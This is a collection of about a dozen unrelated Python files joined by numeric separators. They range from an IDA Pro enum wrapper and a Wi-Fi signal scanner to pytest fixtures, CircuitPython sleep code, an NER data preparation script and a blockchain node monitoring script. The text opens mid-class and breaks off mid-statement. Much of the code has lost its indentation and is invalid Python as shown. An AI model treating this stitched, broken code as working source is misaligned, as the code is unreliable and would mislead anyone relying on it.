return ida_enum.get_enum_size(self._eid)
def add(self, name, value):
"""
        Method for adding a new member to this enum.
:param str name: The name of the new member to add.
:param int value: The value of the new member to add.
:raise RuntimeError: If it was not possible to add the new member.
"""
if ida_enum.add_enum_member(self._eid, name, value, ida_enum.DEFMASK) != 0:
raise RuntimeError("Unable to add new member {} ({}) to enum {}".format(name, value, self.name))
def member_by_name(self, name):
"""
Function for getting a member of this enum from its name.
        Internally this function uses :meth:`BEnumMember.get` and checks
that the parent of the member is indeed this enum.
:param str name: The name of the member to get.
:return: A :class`BEnumMember` object.
:raise ValueError: If the name for the enum member does not exist
or if the enum member is not part of this enum.
"""
bem = BEnumMember.get(name) # this will raise a ValueError if name does not exist
if bem.enum != self: # check that we are in the good enum
raise ValueError("Enum member {} exist but not in enum {}".format(name, self.name))
return bem
def __getitem__(self, key):
"""
Getitem method which allow access to the members of the enum from
their name.
        This is just a convenient wrapper on top
of :meth:`~BipEnum.member_by_name`.
:param str key: The name of the member to get.
:return: A :class`BEnumMember` object.
:raise ValueError: If the name for the enum member does not exist
or if the enum member is not part of this enum.
"""
return self.member_by_name(key)
def members_by_value(self, value, _bmask=None):
"""
Function for getting members with a particular value in this enum.
:param int value: The value for which to get the members.
        :param int _bmask: Optional value for specifying the mask; by
            default the default mask is used.
:return: A list of :class:`BEnumMember` representing the enum
member with that value
"""
if _bmask is None:
_bmask = ida_enum.DEFMASK
tmp = ida_enum.get_first_serial_enum_member(self._eid, value, _bmask)
# tmp is a list with the first element being the member id and the
# second a serial ?
mid = tmp[0]
fmid = mid
ser = tmp[1]
midl = []
while mid != idc.BADADDR:
midl.append(mid)
tmp = ida_enum.get_next_serial_enum_member(ser, fmid)
mid = tmp[0]
ser = tmp[1]
return [BEnumMember(m) for m in midl]
def del_member(self, name):
"""
Function for deleting a member from this enum by its name.
        Internally this will first get the enum member using
        :meth:`~BipEnum.member_by_name` and then try to delete it.
:param str name: The name of the member to delete.
:raise ValueError: If the name does not exist.
:raise RuntimeError: If was not able to delete the enum member.
"""
bem = self.member_by_name(name)
if not ida_enum.del_enum_member(self._eid, bem.value, bem._serial, bem._bmask):
raise RuntimeError("Unable to delete enum member {} from {}".format(name, self.name))
@property
def members(self):
"""
Property for getting a list of the members of this enum.
:return: A list of :class:`BEnumMember`.
"""
mml = []
# only way to iterate on members is to use a visitor, thx IDA
class _BipEnumVisitIterator(ida_enum.enum_member_visitor_t):
def visit_enum_member(self, cid, val):
mml.append(BEnumMember(cid))
return 0
ida_enum.for_all_enum_members(self._eid, _BipEnumVisitIterator())
return mml
def __iter__(self):
"""
        Iter method allowing iteration over all members of the enum.
        This is just a wrapper on :meth:`BipEnum.members`. Updates to the
        enum during the iteration will not be taken into account.
"""
for m in self.members:
yield m
########################### GET & CREATE ENUM ########################
@classmethod
def get(cls, name):
"""
Class method for getting a :class:`BipEnum` object from the name
of an existing enum.
:param str name: The name of the enum to get.
:raise ValueError: If the enum ``name`` does not exist.
:return: A :class:`BipEnum` object corresponding to the enum
identified by the name provided.
"""
eid = ida_enum.get_enum(name)
if eid == idc.BADADDR:
raise ValueError("Enum {} does not exist".format(name))
return cls(eid)
@classmethod
def create(cls, name):
"""
Class method allowing to create a new empty enum.
:param str name: The name of the enum to create. If this is
``None`` a default name ``enum_INT`` will be created by IDA.
:raise ValueError: If the enum ``name`` already exist.
:raise RuntimeError: If it was not possible to create the enum.
:return: A :class:`BipEnum` object corresponding to the newly
created enum.
"""
eid = ida_enum.get_enum(name)
if eid != idc.BADADDR:
raise ValueError("Enum {} already exist".format(name))
eid = ida_enum.add_enum(idc.BADADDR, name, 0)
if eid == idc.BADADDR:
raise RuntimeError("Unable to create enum {}".format(name))
return cls(eid)
@staticmethod
def delete(arg):
"""
Static method allowing to delete an enum by its name or its id.
        :param arg: String representing the name of the enum, or the id (int)
            representing the enum in IDA, or a :class:`BipEnum` object (in
            that case the object will no longer be valid afterwards).
:raise ValueError: If the argument is invalid.
"""
if isinstance(arg, (str, unicode)):
eid = ida_enum.get_enum(arg)
if eid == idc.BADADDR:
raise ValueError("Enum {} does not exist".format(arg))
elif isinstance(arg, (int, long)):
eid = arg
elif isinstance(arg, BipEnum):
eid = arg._eid
else:
raise ValueError("Invalid argument")
ida_enum.del_enum(eid)
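# Illustrative only: a minimal sketch of the BipEnum API documented above.
# The enum and member names are invented for the example.
def _example_bipenum_usage():
    """Not called anywhere; creates an enum, adds members and deletes it."""
    errors = BipEnum.create("example_errors")   # raises ValueError if it already exists
    errors.add("EX_OK", 0)
    errors.add("EX_FAIL", 1)
    member = errors["EX_FAIL"]                  # shorthand for errors.member_by_name("EX_FAIL")
    assert member.value == 1
    BipEnum.delete("example_errors")            # clean up by name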
class BEnumMember(BipRefElt):
"""
    Class for representing and manipulating an enum member. Objects
    of this class can be accessed, created and deleted through methods of
    :class:`BipEnum`. It is possible to directly get an object of this
    type using :meth:`BEnumMember.get`.
    Objects of this class support the xref API implemented in the
parent class :class:`BipRefElt`.
"""
############################# BASE ####################################
def __init__(self, member_id):
super(BEnumMember, self).__init__(member_id)
self._member_id = member_id
@classmethod
def _is_this_elt(cls, idelt):
"""
        Return true if ``idelt`` corresponds to an enum member id.
        In practice this tries to get the associated enum for this potential
        member id and checks whether it succeeds.
"""
return ida_enum.get_enum_member_enum(idelt) != idc.BADADDR
@property
def _mid(self):
"""
        Property which returns the enum member id for this object.
        Used for interfacing with IDAPython internals.
"""
return self._member_id
@property
def _serial(self):
"""
        Property which returns the "serial" of this enum member. This is
        used only for interfacing with the native IDAPython API.
        The serial is not a unique id for this enum member: serials always
        start at 0 and are incremented only when two enum members have the
        same value.
:return: The serial integer for this enum member.
"""
return ida_enum.get_enum_member_serial(self._mid)
@property
def _bmask(self):
"""
        Property for getting the bitmask of this enum member. This is used
        only for interfacing with the native IDAPython API. It is not clear
        what the bitmask is actually used for in IDA.
:return: An integer representing the bitmask for this member.
"""
return ida_enum.get_enum_member_bmask(self._mid)
def __eq__(self, other):
"""
Equality operator for two :class:`BEnumMember`.
"""
if isinstance(other, BEnumMember):
return self._mid == other._mid
elif isinstance(other, (int, long)):
return self._mid == other
else:
return NotImplemented
def __ne__(self, other):
return not self.__eq__(other)
@property
def value(self):
"""
Property for getting the value of this enum member.
:return int: The value of this enum member.
"""
return ida_enum.get_enum_member_value(self._mid)
@property
def name(self):
"""
Property for getting and setting the name of this enum member.
:return str: The name of this enum member.
"""
return ida_enum.get_enum_member_name(self._mid)
@name.setter
def name(self, value):
"""
Setter property for changing the name of an enum member.
:param str value: The new name for the enum member.
:raise RuntimeError: If was unable to change the name.
"""
if not ida_enum.set_enum_member_name(self._mid, value):
raise RuntimeError("Unable to set enum name to {}".format(value))
@property
def enum(self):
"""
Property for getting the :class:`BipEnum` object from this member.
:return: The :class:`BipEnum` associated with this member.
"""
return BipEnum(ida_enum.get_enum_member_enum(self._mid))
def __str__(self):
return "EnumMember: {}.{} ({})".format(self.enum.name, self.name, self.value)
@property
def comment(self):
"""
        Property which returns the comment associated with an enum member.
:return: The comment as a string or None if no comment is
associated with it.
"""
return ida_enum.get_enum_member_cmt(self._mid, False)
@comment.setter
def comment(self, value):
"""
Property setter for changing the enum member comment.
:param str value: The new comment to set.
"""
ida_enum.set_enum_member_cmt(self._mid, value, False)
@property
def rcomment(self):
"""
        Property which returns the repeatable comment associated with an
enum member.
:return: The comment as a string or None if no comment is
associated with it.
"""
return ida_enum.get_enum_member_cmt(self._mid, True)
@rcomment.setter
def rcomment(self, value):
"""
Property setter for changing the enum member repeatable comment.
:param str value: The new comment to set.
"""
ida_enum.set_enum_member_cmt(self._mid, value, True)
############################### GET #################################
@classmethod
def get(cls, name):
"""
        Class method for retrieving a :class:`BEnumMember` object from
its name.
:return: A :class:`BEnumMember` object associated with the name.
:raise ValueError: If no enum member with this name exist.
"""
mid = ida_enum.get_enum_member_by_name(name)
if mid == idc.BADADDR:
raise ValueError("Enum member with name {} was not found".format(name))
return cls(mid)
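# Illustrative only: looking an enum member up directly by name, assuming the
# "example_errors" enum from the sketch further above exists in the IDB.
def _example_benummember_lookup():
    """Not called anywhere; shows BEnumMember.get and its basic properties."""
    member = BEnumMember.get("EX_FAIL")       # raises ValueError if the name is unknown
    print(member.name, member.value, member.enum.name)
    member.comment = "returned on failure"    # plain (non repeatable) comment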
|
457248
|
import sys
import subprocess
import re
from tabulate import tabulate
import textwrap
import warnings
import datetime as dt
import numpy as np
from scipy.interpolate import interp1d
from ._exceptions import InterfaceError, AdapterUnaccessibleError
from .utils import db2dbm, RealTimePlot, spin, rssi_to_colour_str
from ._base import show_header, term
OUT_OF_RANGE = (-300, -200)
VALUES_PER_FRAME = 50
LOADING_HANDLER = None
NAME_DICT = dict()
cells_re = re.compile(r'Cell \d+ - ')
quality_re_dict = {
'dBm': re.compile(
r'Quality[=:](?P<quality>\d+/\d+).*Signal level[=:](?P<siglevel>-\d+) dBm?(.*Noise level[=:](?P<noiselevel>-\d+) dBm)?'),
'relative': re.compile(r'Quality[=:](?P<quality>\d+/\d+).*Signal level[=:](?P<siglevel>\d+/\d+)'),
'absolute': re.compile(r'Quality[=:](?P<quality>\d+).*Signal level[=:](?P<siglevel>\d+)')
}
frequency_re = re.compile(r'^(?P<frequency>[\d\.]+ .Hz)(?:[\s\(]+Channel\s+(?P<channel>\d+)[\s\)]+)?$')
# Checks if wifi is off
network_down_re = re.compile(r'.*Network is down*.')
identity = lambda x: x
key_translations = {
'encryption key': 'encrypted',
'essid': 'ssid',
}
class Cell:
"""
Presents a Python interface to the output of iwlist.
"""
def __init__(self, show_extra_info=False, color=True):
self.ssid = None
self.bitrates = []
self.address = None
self.channel = None
self.encrypted = False
self.encryption_type = None
self.frequency = None
self.mode = None
self.quality = None
self.signal = None
self.noise = None
self.show_extra_info = show_extra_info
self.color = color
@property
def colour_coded_rssi(self):
"""
returns the colour coded rssi value
"""
return rssi_to_colour_str(self.signal)
def __repr__(self):
return 'Cell(ssid={ssid})'.format(**vars(self))
def __getitem__(self, index):
if self.color:
rssi = self.colour_coded_rssi
else:
rssi = self.signal
if self.show_extra_info:
ls = [self.ssid, self.address, rssi, self.frequency, self.quality, \
self.encryption_type, self.mode, self.channel]
else:
ls = [self.ssid, self.address, rssi]
return ls[index]
def scan(color=True, show_extra_info=False):
"""
Returns a list of all cells extracted from the output of iwlist.
"""
global LOADING_HANDLER, NAME_DICT
try:
iwlist_scan = subprocess.check_output(['iwlist', 'scan'],
stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
raise InterfaceError(e.output.strip())
else:
iwlist_scan = iwlist_scan.decode('utf-8')
_normalize = lambda cell_string: normalize(cell_string, color, show_extra_info)
cells = [_normalize(i) for i in cells_re.split(iwlist_scan)[1:]]
        # If there are no wifi signals, check whether it is because the wifi adapter is disabled
if not len(cells):
_no_card = network_down_re.search(iwlist_scan)
if _no_card is not None:
raise AdapterUnaccessibleError("Cannot access Network Adapter, is your Wifi off?")
# terminate loader
if LOADING_HANDLER:
LOADING_HANDLER.terminate()
# update NAME_DICT
NAME_DICT.update({i.address: i.ssid for i in cells})
return cells
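# Illustrative only: a hedged sketch of calling scan() directly; running iwlist
# typically requires root privileges and a wireless interface.
def _example_scan_usage():
    """Not called anywhere; prints the SSID, MAC address and RSSI of every visible network."""
    for cell in scan(color=False, show_extra_info=False):
        print(cell.ssid, cell.address, cell.signal)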
def normalize_key(key):
key = key.strip().lower()
key = key_translations.get(key, key)
return key.replace(' ', '')
normalize_value = {
'ssid': lambda v: v.strip('"'),
'encrypted': lambda v: v == 'on',
'address': identity,
'mode': identity,
'channel': int,
}
def split_on_colon(string):
key, _, value = map(lambda s: s.strip(), string.partition(':'))
return key, value
def normalize(cell_block, color, show_extra_info=False):
# The cell blocks come in with every line except the first indented at
# least 20 spaces. This removes the first 20 spaces off of those lines.
lines = textwrap.dedent(' ' * 20 + cell_block).splitlines()
cell = Cell(show_extra_info=show_extra_info, color=color)
while lines:
line = lines.pop(0)
if line.startswith('Quality'):
for re_name, quality_re in quality_re_dict.items():
match_result = quality_re.search(line)
if match_result is not None:
groups = match_result.groupdict()
cell.quality = groups['quality']
signal = groups['siglevel']
noise = groups.get('noiselevel')
if re_name == 'relative':
actual, total = map(int, signal.split('/'))
cell.signal = db2dbm(int((actual / total) * 100))
elif re_name == 'absolute':
cell.quality = cell.quality + '/100'
cell.signal = db2dbm(int(signal))
else:
cell.signal = int(signal)
if noise is not None:
cell.noise = int(noise)
break
elif line.startswith('Bit Rates'):
values = split_on_colon(line)[1].split('; ')
# consume next line of bit rates, because they are split on
# different lines, sometimes...
if lines:
while lines[0].startswith(' ' * 10):
values += lines.pop(0).strip().split('; ')
cell.bitrates.extend(values)
elif ':' in line:
key, value = split_on_colon(line)
key = normalize_key(key)
if key == 'ie':
if 'Unknown' in value:
continue
# consume remaining block
values = [value]
while lines and lines[0].startswith(' ' * 4):
values.append(lines.pop(0).strip())
if 'WPA2' in value:
cell.encryption_type = 'wpa2'
elif 'WPA' in value:
cell.encryption_type = 'wpa'
else:
cell.encryption_type = 'null'
if key == 'frequency':
matches = frequency_re.search(value)
cell.frequency = matches.group('frequency')
if matches.group('channel'):
cell.channel = int(matches.group('channel'))
elif key in normalize_value:
setattr(cell, key, normalize_value[key](value))
# It seems that encryption types other than WEP need to specify their
# existence.
if cell.encrypted and not cell.encryption_type:
cell.encryption_type = 'wep'
return cell
def animate(i, ax, plt, xs, val_dict, _show_extra_info, headers):
"""
animate a real time graph plot of RSSI against time
"""
global NAME_DICT
xs.append(float(dt.datetime.now().strftime("%H.%M%S")))
    _signals = scan(show_extra_info=_show_extra_info)
show_header("WIFI")
print(tabulate(_signals, headers=headers))
print("\n\n")
for i in _signals:
# check for dict key if it exists and append
try:
# if signal is not None
if i.signal:
val_dict[i.address].append(i.signal)
else:
                val_dict[i.address].append(np.random.random_integers(*OUT_OF_RANGE))
except:
# create new list with prior values out of range
val_dict[i.address] = list()
val_dict[i.address].extend([np.random.random_integers(*OUT_OF_RANGE) \
for i in range(len(xs))])
ax.clear()
# limit both axis to VALUES_PER_FRAME values at a time maximum
xs = xs[-VALUES_PER_FRAME:]
for i in val_dict:
device_name = NAME_DICT[i]
val_dict[i] = val_dict[i][-VALUES_PER_FRAME:]
        # if device has disappeared, append OUT_OF_RANGE to make up length
if len(val_dict[i]) < len(xs):
val_dict[i].extend([np.random.random_integers(*OUT_OF_RANGE) \
for i in range(len(xs) - len(val_dict[i]))])
        # if the y series is longer than the x axis (duplicate readings), trim it
if len(xs) < len(val_dict[i]):
val_dict[i] = val_dict[i][-len(xs):]
# smoothen out x axis before display
x = np.array(xs)
y = np.array(val_dict[i])
x_new = np.linspace(x.min(), x.max(), 500)
        # if there are enough points, use box (nearest) interpolation
        # to smooth the displayed levels
if len(x) > 2:
f = interp1d(x, y, kind='nearest')
y_smooth = f(x_new)
# plot smooth plot with scatter point plots
ax.plot(x_new, y_smooth, label=device_name)
else:
ax.plot(xs, y, label=device_name)
# ax.scatter(xs, y)
    # display legend, attempt to suppress warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
ax.legend()
plt.xticks([])
plt.ylim(-100, 0)
plt.title("Wifi Devices RSSI against time")
plt.ylabel("Wifi RSSI")
plt.xlabel("Time")
def wifilyze(**kwargs):
""" Display wifi analyzed details"""
global LOADING_HANDLER
_show_graph = kwargs.pop("graph")
_show_extra_info = kwargs.pop("show_extra_info")
_analyze_all = kwargs.pop("analyze_all")
_color = kwargs.get("color", True)
headers = ["Name", "MAC Address", "RSSI"]
if _show_extra_info:
headers.extend(["Frequency", "Quality", "Encryption Type", "Mode of Device", "Channel"])
if _analyze_all:
# return _signals and headers of wifi tables if analyze all
_signals = scan(_color, _show_extra_info)
return ((_signals, headers))
else:
try:
LOADING_HANDLER = spin(
before="Initializing ",
after="\nScanning for Wifi Devices")
if _show_graph:
                _signals = scan(show_extra_info=_show_extra_info)
show_header("WIFI")
print(tabulate(_signals, headers=headers, disable_numparse=True))
print("\n\n")
x = []
                val_dict = {i.address: list() for i in scan(show_extra_info=_show_extra_info)}
realtimehandler = RealTimePlot(
func=animate,
func_args=(x, val_dict, _show_extra_info, headers)
)
realtimehandler.animate()
else:
while True:
                    _signals = scan(show_extra_info=_show_extra_info)
if not bool(_signals):
LOADING_HANDLER = spin(before="No Devices found ")
else:
show_header("WIFI")
print(tabulate(_signals, headers=headers, disable_numparse=True))
print("\n\n")
except AdapterUnaccessibleError as e:
LOADING_HANDLER.terminate()
show_header("WIFI")
print(e)
sys.exit(1)
|
457257
|
import pytest
pytestmark = [
pytest.mark.django_db,
pytest.mark.freeze_time('2032-12-01 16:20'),
]
@pytest.fixture(autouse=True)
def material(course, mixer):
return mixer.blend('notion.Material', course=course, is_home_page=True, page_id='deadbeef')
@pytest.fixture
def another_material(course, mixer, freezer):
freezer.move_to('2032-12-01 16:40') # 20 minutes later
return mixer.blend('notion.Material', course=course, is_home_page=True, page_id='beef')
def test_slug(api):
got = api.get('/api/v2/studies/purchased/')['results']
assert got[0]['home_page_slug'] == 'deadbeef'
@pytest.mark.usefixtures('another_material')
def test_latest_material_is_used(api):
got = api.get('/api/v2/studies/purchased/')['results']
assert got[0]['home_page_slug'] == 'beef'
def test_material_without_home_page_flag_is_ignored(api, material):
material.setattr_and_save('is_home_page', False)
got = api.get('/api/v2/studies/purchased/')['results']
assert got[0]['home_page_slug'] is None
|
457282
|
import alarm
import board
import time
import digitalio
import neopixel
## WAKING PINS - uncomment appropriate pin per microcontroller
wake_pin = board.X1 # STM32F4 Pyboard
# wake_pin = board.GP0 # RP2040 Pico
# wake_pin = board.A4 # NRF52840 Feather
# wake_pin = board.IO5 # ESP32-S2 Saola
## LED - use on RP2040 Pico, STM32F4 Pyboard
## PinAlarms blink 1x, TimeAlarms 2x, Startup 3x
led_pin = board.LED
led = digitalio.DigitalInOut(led_pin)
led.direction = digitalio.Direction.OUTPUT
def blink(num_blinks):
for i in range(num_blinks):
led.value = True
time.sleep(0.2)
led.value = False
time.sleep(0.2)
def show_timealarm():
blink(2)
def show_pinalarm():
blink(1)
def show_noalarm():
blink(3)
## Comment out above if using Neopixel
## NEOPIXEL - use on Circuitplayground Bluefruit, ESP32-S2 Saola
## TimeAlarms are red, PinAlarms are blue, Default is white
# np = neopixel.NeoPixel(board.NEOPIXEL, 1)
# def show_timealarm():
# np[0] = (50, 0, 0)
# time.sleep(1)
# np[0] = (0, 0, 0)
# def show_pinalarm():
# np[0] = (0, 0, 50)
# time.sleep(1)
# np[0] = (0, 0, 0)
# def show_noalarm():
# np[0] = (50, 50, 50)
# time.sleep(1)
# np[0] = (0, 0, 0)
## Comment out above if using LED
## Show which alarm woke the chip
print("Wake alarm:")
print(alarm.wake_alarm)
if isinstance(alarm.wake_alarm, alarm.time.TimeAlarm):
show_timealarm()
elif isinstance(alarm.wake_alarm, alarm.pin.PinAlarm):
show_pinalarm()
else:
show_noalarm()
## USB enumeration may take 4-5s per restart
time_alarm = alarm.time.TimeAlarm(monotonic_time=time.monotonic() + 10)
## Deep sleep pin alarms may only accept a single configuration.
pin_alarm = alarm.pin.PinAlarm(
pin=wake_pin, value=True, edge=True, pull=True
) # STM32 must be this exact config
# pin_alarm = alarm.pin.PinAlarm(pin=wake_pin, value=False, edge=False, pull=True) # NRF and ESP32S2 must use level, not edge
# pin_alarm = alarm.pin.PinAlarm(pin=wake_pin, value=False, edge=True, pull=True) # RP2040 supports any config
alarm.exit_and_deep_sleep_until_alarms(time_alarm, pin_alarm)
# alarm.exit_and_deep_sleep_until_alarms(pin_alarm) # Using TimeAlarm will reduce performance on the RP2040
# alarm.exit_and_deep_sleep_until_alarms(time_alarm) # Using PinAlarm will reduce performance on the ESP32-S2
|
457284
|
import sys
import os
import dk
import gc
from .mainframe import MainFrame
class App(dk.App):
    ''' Application instance (dk.App) '''
def onInit(self):
self.resourceDir = os.path.abspath(os.path.join( os.path.dirname(__file__), 'resources' ))
print('resourceDir: ', self.resourceDir)
displayBounds = self.displayBounds(0)
contentBounds = self.screenContentBounds(0)
print('displayBounds: ', displayBounds)
print('contentBounds: ', contentBounds)
platform = dk.platform()
contentSize = dk.Size(1024, 768)
if 'ios' in platform or 'android' in platform:
contentSize = dk.Size(contentBounds.size)
else:
if contentSize.width > contentBounds.width:
contentSize.width = contentBounds.width
if contentSize.height > contentBounds.height:
contentSize.height = contentBounds.height
print('main screen resolution: ', contentSize)
window = dk.Window('editor', contentSize)
screen = dk.Screen(window, MainFrame())
if not screen:
print('screen error!?')
self.terminate(2)
else:
self.screen = screen
self.screen.activeFrameLatency = 0
self.screen.inactiveFrameLatency = 0
self.screen.window.activate()
pass
def onExit(self):
if hasattr(self, 'screen'):
self.screen.terminate(True)
self.screen = None
gc.collect()
if __name__ == '__main__':
App().run()
|
457290
|
from utils.basic_utils import load_json, save_json
def combine(video_name_split_path, video_duration_path, save_path):
video_name_split = load_json(video_name_split_path)
video_duration_dict = load_json(video_duration_path)
combined_dict = {}
for split_name, split_video_names in video_name_split.items():
combined_dict[split_name] = {vid_name: video_duration_dict[vid_name]
for vid_name in split_video_names}
save_json(combined_dict, save_path)
if __name__ == '__main__':
import sys
combine(*sys.argv[1:])
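# Illustrative only: expected input/output shapes (video names and durations are placeholders).
#   video_name_split.json : {"train": ["vid001", "vid002"], "val": ["vid003"]}
#   video_duration.json   : {"vid001": 12.4, "vid002": 7.9, "vid003": 30.0}
#   combined save_path    : {"train": {"vid001": 12.4, "vid002": 7.9}, "val": {"vid003": 30.0}}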
|
457359
|
from navycut.utils.server import create_asgi_app
from os import environ
# Asynchronous server gateway interface (ASGI) entry point.
# Use an ASGI server such as uvicorn to run this app.
# Define your default settings module here:
environ.setdefault("NAVYCUT_SETTINGS_MODULE", "check1.settings")
application = create_asgi_app()
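# A hedged usage example (assuming this module is importable as "asgi"):
#   uvicorn asgi:application --host 0.0.0.0 --port 8000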
|
457388
|
import os
from argparse import ArgumentParser
import random
def read_ner(path):
data = [[]]
with open(path, encoding='ISO-8859-1') as f:
for line in f:
line = line.strip()
# New sentence
if len(line) == 0:
if len(data[-1]) > 0:
data.append([])
continue
if line == '-DOCSTART- -DOCSTART- O':
continue
# Add token to sentence
tok, _, label = line.split()
label = label[0] + label[1:].lower()
data[-1].append((tok, label))
if len(data[-1]) == 0:
del data[-1]
return data
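# Illustrative only: read_ner expects CoNLL-2002 style lines of
# "token pos-tag ner-label", with blank lines separating sentences.
# The tokens below are invented but follow that shape:
#
#   De Art O
#   minister N O
#   Bot N B-PER
#
# which this parser turns into [('De', 'O'), ('minister', 'O'), ('Bot', 'B-per')]
# (everything after the first character of the label is lower-cased).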
def prepare_ner(conll_path):
train_path = os.path.join(conll_path, 'ned.train')
dev_path = os.path.join(conll_path, 'ned.testa')
test_path = os.path.join(conll_path, 'ned.testb')
train = read_ner(train_path)
dev = read_ner(dev_path)
test = read_ner(test_path)
return train, dev, test
def write_tsv(path, data):
label_counts = {}
with open(path, 'w') as f:
for sent in data:
for tok, label in sent:
if label not in label_counts:
label_counts[label] = 0
label_counts[label] += 1
f.write('{}\t{}\n'.format(tok, label))
f.write('\n')
print('Labels in {} ({} labels):'.format(path, len(label_counts)))
total = sum(label_counts.values())
for label in sorted(label_counts, key=label_counts.get, reverse=True):
count = label_counts[label]
print('{:10} {:>8} ({:.2f}%)'.format(label, count, count / total * 100))
print('')
def save_data(data, out_path):
if len(data) == 0:
print('No data found')
return
os.makedirs(os.path.join(out_path, 'ner'))
train, dev, test = data
# Write to files
write_tsv(os.path.join(out_path, 'ner', 'train.tsv'), train)
write_tsv(os.path.join(out_path, 'ner', 'dev.tsv'), dev)
write_tsv(os.path.join(out_path, 'ner', 'test.tsv'), test)
total = len(train) + len(dev) + len(test)
print('NER: Train={:.2f}, Dev={:.2f}, Test={:.2f}'.format(len(train) / total, len(dev) / total, len(test) / total))
def main():
    parser = ArgumentParser(description='Prepare CoNLL-2002 NER data.')
parser.add_argument("-i", dest="in_path", required=True, help="Path to CoNLL-2002 NER data", metavar="FILE")
parser.add_argument("-o", dest="out_path", default='conll2002', help="Target location", metavar="FILE")
parser.add_argument("--seed", dest="seed", default=6544, help="Random seed")
args = parser.parse_args()
if not os.path.exists(args.in_path):
print('provide a valid input path')
return
if os.path.exists(args.out_path):
print('output path already exists')
return
random.seed(args.seed)
print(' > Preparing NER data')
save_data(prepare_ner(args.in_path), args.out_path)
if __name__ == '__main__':
main()
|
457391
|
import json
from os.path import expanduser
class RenderEnvironment():
def __init__(self):
self.queueName = None
self.largeDiskQueueName = None
self.jobDefinition = None
self.sourceBucket = None
self.resultsBucket = None
def validate(self):
if self.queueName is None:
raise Exception('Queue name not set.')
if self.largeDiskQueueName is None:
raise Exception('Large disk queue name not set.')
if self.jobDefinition is None:
raise Exception('Job definition not set.')
if self.sourceBucket is None:
raise Exception('Source bucket not set.')
if self.resultsBucket is None:
raise Exception('Results bucket not set.')
@classmethod
def load(cls, path=None):
with open(cls._get_path(path), 'r') as f:
text = f.read()
obj = json.loads(text)
return RenderEnvironment._from_dict(obj)
@classmethod
def _from_dict(cls, obj):
env = RenderEnvironment()
env.queueName = obj['queueName']
env.largeDiskQueueName = obj['largeDiskQueueName']
env.jobDefinition = obj['jobDefinition']
env.sourceBucket = obj['sourceBucket']
env.resultsBucket = obj['resultsBucket']
return env
@classmethod
def from_stack_outputs(cls, outputs):
env = RenderEnvironment()
env.queueName = RenderEnvironment._after_last_slash(outputs['RenderJobQueue'])
env.largeDiskQueueName = RenderEnvironment._after_last_slash(outputs['LargeDiskRenderJobQueue'])
env.jobDefinition = RenderEnvironment._after_last_slash(outputs['RenderJobDefinition'])
env.sourceBucket = outputs['SourceBucket']
env.resultsBucket = outputs['ResultsBucket']
return env
@classmethod
def _after_last_slash(cls, string):
index = string.rfind('/')
if index <= 0:
return string
else:
return string[index + 1:]
def save(self, path=None):
text = json.dumps(self._to_dict())
with open(self._get_path(path), 'w') as f:
f.write(text)
def _to_dict(self):
return {
'queueName': self.queueName,
'largeDiskQueueName': self.largeDiskQueueName,
'jobDefinition': self.jobDefinition,
'sourceBucket': self.sourceBucket,
'resultsBucket': self.resultsBucket
}
@classmethod
def _get_path(cls, specified_path):
if specified_path:
return specified_path
else:
return expanduser('~/.renderconfig')
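# Illustrative only: a minimal sketch of the round trip this class supports.
# The queue, job definition and bucket names are placeholders, not real resources.
def _example_render_environment_usage():
    """Not called anywhere; builds an environment, saves it and loads it back."""
    env = RenderEnvironment()
    env.queueName = 'render-queue'
    env.largeDiskQueueName = 'render-queue-large-disk'
    env.jobDefinition = 'render-job'
    env.sourceBucket = 'render-source-bucket'
    env.resultsBucket = 'render-results-bucket'
    env.validate()                     # raises if any field is still None
    env.save()                         # writes ~/.renderconfig by default
    return RenderEnvironment.load()    # reads it back from the same default path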
|
457409
|
import pytest
from cx_const import Number, StepperDir
from cx_core.stepper import MinMax, Stepper, StepperOutput
class FakeStepper(Stepper):
def __init__(self) -> None:
super().__init__(MinMax(0, 1), 1)
def step(self, value: Number, direction: str) -> StepperOutput:
return StepperOutput(next_value=0, next_direction=None)
@pytest.mark.parametrize(
"direction_input, previous_direction, expected_direction",
[
(StepperDir.UP, StepperDir.UP, StepperDir.UP),
(StepperDir.DOWN, StepperDir.DOWN, StepperDir.DOWN),
(StepperDir.UP, StepperDir.DOWN, StepperDir.UP),
(StepperDir.DOWN, StepperDir.UP, StepperDir.DOWN),
(StepperDir.TOGGLE, StepperDir.UP, StepperDir.DOWN),
(StepperDir.TOGGLE, StepperDir.DOWN, StepperDir.UP),
],
)
def test_get_direction(
direction_input: str, previous_direction: str, expected_direction: str
) -> None:
stepper = FakeStepper()
stepper.previous_direction = previous_direction
direction_output = stepper.get_direction(0, direction_input)
assert direction_output == expected_direction
@pytest.mark.parametrize(
"direction_input, expected_sign",
[
(StepperDir.UP, 1),
(StepperDir.DOWN, -1),
(StepperDir.UP, 1),
(StepperDir.DOWN, -1),
],
)
def test_sign(direction_input: str, expected_sign: int) -> None:
stepper = FakeStepper()
sign_output = stepper.sign(direction_input)
assert sign_output == expected_sign
|
457411
|
import os
import json
import copy
import subprocess
from dotenv import load_dotenv, find_dotenv
import yaml
import logging
import argparse
import requests
# grafana api host
grafana_api_host = "https://monitor.harmony.one/api/"
# set shard count
shard_count = 4
# min storage space for alerting
min_storage_space = 5
# max actual usage memory rate for alerting
max_actual_usage_memory_rate = 80
# scrape_interval for every shard in prometheus
prometheus_scrape_interval = 5
# this grafana folder id dict for mode
dict_grafana_folder_mode = {
"mainnet": 18,
"ostn": 19,
"stn": 20,
"test": 31,
"lrtn": 45,
"pstn": 46,
"dryrun": 52,
"testnet": 105
}
do_node_ips = []
service_list = ['bridge', 'graph', 'multisig', 'contractverify', 'explorerv2']
def shcmd(cmd, ignore_error=False):
ret = subprocess.call(cmd, shell=True)
if ignore_error is False and ret != 0:
raise RuntimeError("Failed to execute {}. Return code:{}".format(
cmd, ret))
return ret
# get latest node ips from github
def download_ip_list_from_github(git_token, mode):
github_dir = mode
# download list of IP from shard
for index in range(shard_count):
url_path = "https://raw.githubusercontent.com/harmony-one/nodedb/" \
"master/{github_dir}/shard{shard_index}.txt".format(shard_index=index, github_dir=github_dir)
cmd = "curl -H 'Authorization: token {token}' " \
"-H 'Accept: application/vnd.github.v3.raw' -o ips/{mode}/shard{shard_index}.txt " \
"{path}".format(token=git_token, shard_index=index, path=url_path, mode=mode)
shcmd(cmd)
if mode == "mainnet":
# download list of DNS IP from shard
for index in range(shard_count):
url_path = "https://raw.githubusercontent.com/harmony-one/nodedb/" \
"master/{github_dir}/dns.shard{shard_index}.txt".format(shard_index=index, github_dir=github_dir)
cmd = "curl -H 'Authorization: token {token}' " \
